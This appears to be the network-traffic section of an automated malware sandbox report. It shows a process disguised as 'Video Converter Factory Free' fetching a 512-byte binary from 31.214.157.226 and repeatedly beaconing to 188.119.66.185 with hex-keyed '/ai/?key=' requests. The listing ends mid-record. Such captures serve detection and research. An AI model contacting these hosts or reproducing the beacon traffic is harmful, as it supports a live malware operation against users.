                                                                                                    Data Ascii: J88HQu6CR't?{hru.A[,&DD~pEqZ<h"=]GvTh#aZJv.V6 ;K$%*Cr A ?$=\VXbBze 5?9B)/%6G+#WJ`w-!w?ao%? {q\w>e<U6`chs,$^Bg=04>rW|'s V23e*X0;7bRQmDPX=`exE.{u"}Nb@8;;^K"<U %[yrRwwQgPKpD=NDSJR&D9rvJ$zM/v"0mcdzKhu


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.94999131.214.157.226807880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 16, 2024 13:44:38.670474052 CET57OUTGET /rand HTTP/1.1
                                                                                                    Host: 31.214.157.226
                                                                                                    Accept: */*
                                                                                                    Dec 16, 2024 13:44:39.062680006 CET765INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.27.0
                                                                                                    Date: Mon, 16 Dec 2024 12:44:38 GMT
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Length: 512
                                                                                                    Last-Modified: Fri, 02 Aug 2024 10:35:15 GMT
                                                                                                    Connection: keep-alive
                                                                                                    ETag: "66acb663-200"
                                                                                                    Accept-Ranges: bytes
                                                                                                    Data Raw: f1 d9 4a c0 19 06 38 38 48 c8 13 c0 87 51 f2 f6 75 36 43 c2 e3 fa 93 12 84 52 27 0c 74 f3 3f 7b e6 68 bd 72 0f b9 ba f4 04 75 87 9a 2e 05 41 d3 9c 5b e6 06 f0 00 03 b1 2c 26 44 dc 44 f5 b3 c0 dd 7e d5 70 91 45 b4 d6 f4 b4 71 5a 81 01 c7 f2 0a 08 3c ac 68 a3 22 3d 5d 0c a5 e0 12 93 b0 14 47 cd 04 b4 76 ea e3 95 b5 54 68 dd 23 61 5a 4a 1a 76 2e b2 56 cb f2 36 d1 05 a7 20 b4 f0 3b 4b e0 24 d1 25 17 bd 14 c9 dd 2a 87 bf 43 72 20 1f d3 ce da e1 e1 b2 f8 99 41 20 3f 24 3d 5c fa b4 56 58 ca 18 c4 62 e3 9c 08 42 cc d3 ad f6 8d e1 cb a3 85 0b 7a c6 65 20 20 35 19 3f d2 15 39 19 f8 97 c4 b0 97 85 bd b6 ab c3 e4 1c 42 d5 c9 29 2f 06 c0 02 25 f6 36 47 8e a1 8b 2b ad 23 57 4a 60 ca 77 d1 2d d7 21 77 3f 19 61 8e 6f 9d 25 b8 df 3f 0f b6 fb 20 82 d5 b8 c6 d2 09 7b 71 96 bc 5c 77 99 99 0f 85 fd 3e 87 8e 65 91 93 85 3c 55 36 bb 60 63 68 83 b4 73 2c 24 5e 42 fa 80 67 a0 3d a9 ae de 9d 83 e1 db 0d 30 a4 34 3e 72 0f 57 7c 02 1c 80 19 27 73 20 af c1 56 32 02 11 e6 97 33 12 65 cf 2a e4 58 c4 30 f1 3b 08 fa f5 37 62 1a d0 [TRUNCATED]
                                                                                                    Data Ascii: J88HQu6CR't?{hru.A[,&DD~pEqZ<h"=]GvTh#aZJv.V6 ;K$%*Cr A ?$=\VXbBze 5?9B)/%6G+#WJ`w-!w?ao%? {q\w>e<U6`chs,$^Bg=04>rW|'s V23e*X0;7bRQmDPX=`exE.{u"}Nb@8;;^K"<U %[yrRwwQgPKpD=NDSJR&D9rvJ$zM/v"0mcdzKhu


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.949837188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:43:41 UTC283OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd3250aa15d405633775b0e650f3ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda30211ad3328b HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:43:42 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:43:42 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:43:42 UTC800INData Raw: 33 31 34 0d 0a 38 62 37 32 33 63 36 38 65 65 31 38 34 30 33 63 36 36 30 66 62 66 65 30 33 38 34 63 32 37 62 36 62 63 38 66 38 30 32 32 34 63 62 64 33 62 63 31 39 30 32 34 39 66 37 65 31 36 66 65 30 34 64 64 65 37 36 37 34 62 62 33 35 63 38 64 31 65 33 66 37 38 37 61 61 30 61 66 30 64 39 62 66 35 30 31 64 32 39 39 62 31 63 61 32 39 37 34 64 35 66 36 34 63 63 34 39 36 66 63 35 32 64 36 64 62 39 63 35 66 61 64 62 36 66 34 63 31 30 33 30 32 63 33 64 34 31 62 31 66 64 64 33 31 33 61 31 62 64 32 33 32 39 32 64 35 64 30 39 31 35 37 34 39 63 39 37 30 33 34 66 32 64 34 30 33 34 62 36 64 31 36 36 63 63 63 66 37 31 31 36 38 62 62 66 37 35 36 61 34 65 66 65 62 35 32 61 61 37 66 63 31 63 32 33 66 66 34 66 37 63 37 66 32 34 38 31 32 38 64 34 36 39 39 33 65 61 35 33 37
                                                                                                    Data Ascii: 3148b723c68ee18403c660fbfe0384c27b6bc8f80224cbd3bc190249f7e16fe04dde7674bb35c8d1e3f787aa0af0d9bf501d299b1ca2974d5f64cc496fc52d6db9c5fadb6f4c10302c3d41b1fdd313a1bd23292d5d0915749c97034f2d4034b6d166cccf71168bbf756a4efeb52aa7fc1c23ff4f7c7f248128d46993ea537


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.949853188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:43:47 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:43:48 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:43:47 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:43:48 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.949859188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:43:49 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:43:50 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:43:50 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:43:50 UTC656INData Raw: 32 38 34 0d 0a 38 62 37 32 32 61 37 37 65 34 31 66 35 35 32 63 33 34 34 38 61 33 65 34 36 64 32 30 37 66 65 38 62 33 38 66 38 35 33 66 35 33 62 39 33 62 64 64 38 63 32 35 39 39 36 66 35 39 62 61 34 39 38 36 38 32 32 35 30 63 65 61 31 38 64 65 31 32 33 62 36 63 33 35 65 34 65 38 35 37 65 61 61 65 34 30 64 64 38 36 62 31 63 62 33 32 37 66 64 33 66 34 35 32 63 35 39 64 66 32 34 39 63 39 64 30 39 39 34 62 61 64 62 32 66 31 64 66 30 61 30 37 63 65 64 63 30 34 31 65 64 65 33 33 32 66 31 65 64 62 32 65 38 64 64 30 64 33 38 61 35 66 34 61 63 62 36 65 33 37 66 39 64 37 30 35 35 35 36 66 31 30 37 39 63 63 66 34 31 63 36 38 62 66 66 30 34 31 61 61 65 66 66 35 35 33 61 63 37 33 63 63 63 62 32 31 66 35 66 33 63 64 65 34 34 38 30 65 38 64 35 38 39 38 32 30 61 65 33 32
                                                                                                    Data Ascii: 2848b722a77e41f552c3448a3e46d207fe8b38f853f53b93bdd8c25996f59ba498682250cea18de123b6c35e4e857eaae40dd86b1cb327fd3f452c59df249c9d0994badb2f1df0a07cedc041ede332f1edb2e8dd0d38a5f4acb6e37f9d705556f1079ccf41c68bff041aaeff553ac73cccb21f5f3cde4480e8d589820ae32


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    3192.168.2.949866188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:43:52 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:43:52 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:43:52 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:43:52 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    4192.168.2.949872188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:43:54 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:43:55 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:43:54 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:43:55 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    5192.168.2.949878188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:43:56 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:43:57 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:43:57 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:43:57 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    6192.168.2.949884188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:43:59 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:43:59 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:43:59 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:43:59 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    7192.168.2.949890188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:44:01 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:44:02 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:44:01 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:44:02 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    8192.168.2.949896188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:44:03 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:44:04 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:44:04 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:44:04 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    9192.168.2.949902188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:44:06 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:44:06 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:44:06 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:44:06 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    10192.168.2.949908188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:44:08 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:44:09 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:44:08 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:44:09 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    11192.168.2.949914188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:44:10 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:44:11 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:44:11 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:44:11 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    12192.168.2.949921188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:44:13 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:44:13 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:44:13 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:44:13 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    13192.168.2.949928188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:44:15 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:44:16 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:44:15 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:44:16 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    14192.168.2.949935188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:44:17 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:44:18 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:44:18 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:44:18 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    15192.168.2.949943188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:44:20 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:44:20 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:44:20 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:44:20 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    16192.168.2.949949188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:44:22 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:44:23 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:44:23 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:44:23 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    17192.168.2.949955188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:44:24 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:44:25 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:44:25 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:44:25 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    18192.168.2.949961188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
